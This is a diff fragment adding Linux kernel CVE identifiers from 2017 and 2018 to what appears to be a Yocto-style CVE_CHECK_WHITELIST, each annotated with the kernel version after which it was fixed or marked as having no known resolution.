+CVE_CHECK_WHITELIST += "CVE-2017-1000405"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-1000407"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-1000410"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10661"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10662"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10663"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10810"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-10911"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11089"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11176"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11472"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-11473"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-11600"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12134"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12146"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-12153"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12154"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12168"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12188"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12190"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-12192"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-12193"
+
+# fixed-version: Fixed after version 4.13rc4
+CVE_CHECK_WHITELIST += "CVE-2017-12762"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-13080"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13166"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13167"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13168"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13215"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-13216"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-13220"
+
+# CVE-2017-13221 has no known resolution
+
+# CVE-2017-13222 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-13305"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-13686"
+
+# CVE-2017-13693 has no known resolution
+
+# CVE-2017-13694 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13695"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13715"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14051"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14106"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-14140"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14156"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14340"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14489"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-14497"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14954"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-14991"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15102"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15115"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15116"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15121"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15126"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15127"
+
+# fixed-version: Fixed after version 4.14rc8
+CVE_CHECK_WHITELIST += "CVE-2017-15128"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15129"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15265"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15274"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15299"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-15306"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15537"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15649"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15868"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15951"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16525"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16526"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16527"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16528"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16529"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16530"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16531"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16532"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16533"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16534"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16535"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16536"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16537"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16538"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16643"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16644"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16645"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16646"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16647"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16648"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16649"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16650"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16911"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16912"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16913"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16914"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16939"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16994"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16995"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16996"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17052"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17053"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17448"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17449"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17450"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17558"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17712"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17741"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17805"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17806"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-17807"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17852"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17853"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17854"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17855"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17856"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17857"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17862"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17863"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17864"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17975"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18017"
+
+# fixed-version: Fixed after version 4.15rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18075"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18079"
+
+# CVE-2017-18169 has no known resolution
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18174"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18193"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-18200"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18202"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18203"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18204"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18208"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18216"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18218"
+
+# fixed-version: Fixed after version 4.12rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18221"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18222"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18224"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18232"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18241"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18249"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18255"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18257"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18261"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18270"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18344"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18360"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18379"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18509"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18549"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18550"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2017-18551"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18552"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18595"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2583"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2584"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2596"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-2618"
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2634"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-2636"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2647"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-2671"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5123"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5546"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5547"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5548"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5549"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5550"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5551"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5576"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5577"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5669"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5715"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5753"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5754"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5897"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5967"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5970"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5972"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5986"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-6001"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6074"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-6214"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6345"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6346"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6347"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6348"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6353"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-6874"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6951"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7184"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7187"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7261"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7273"
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7277"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7294"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7308"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7346"
+
+# CVE-2017-7369 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7374"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7472"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7477"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7482"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7487"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7495"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7518"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7533"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7541"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-7542"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-7558"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7616"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7618"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7645"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7889"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7895"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7979"
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-8061"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8062"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8063"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8064"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8066"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8067"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8068"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8069"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8070"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8071"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8072"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8106"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2017-8240"
+
+# CVE-2017-8242 has no known resolution
+
+# CVE-2017-8244 has no known resolution
+
+# CVE-2017-8245 has no known resolution
+
+# CVE-2017-8246 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8797"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-8824"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8831"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8890"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8924"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8925"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9059"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9074"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9075"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9076"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9077"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9150"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9211"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9242"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-9605"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2017-9725"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9984"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9985"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9986"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-1000004"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1000026"
+
+# fixed-version: Fixed after version 4.15
+CVE_CHECK_WHITELIST += "CVE-2018-1000028"
+
+# fixed-version: Fixed after version 4.16
+CVE_CHECK_WHITELIST += "CVE-2018-1000199"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1000200"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1000204"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10021"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10074"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10087"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10124"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10322"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10323"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-1065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1066"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10675"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1068"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10840"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10853"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1087"
+
+# CVE-2018-10872 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10876"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10877"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10878"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10879"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10880"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10881"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10882"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10883"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10901"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10902"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1091"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1092"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1093"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2018-10938"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1094"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-10940"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1095"
+
+# fixed-version: Fixed after version 4.17rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1108"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1118"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-1120"
+
+# CVE-2018-1121 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11232"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1128"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1129"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1130"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11412"
+
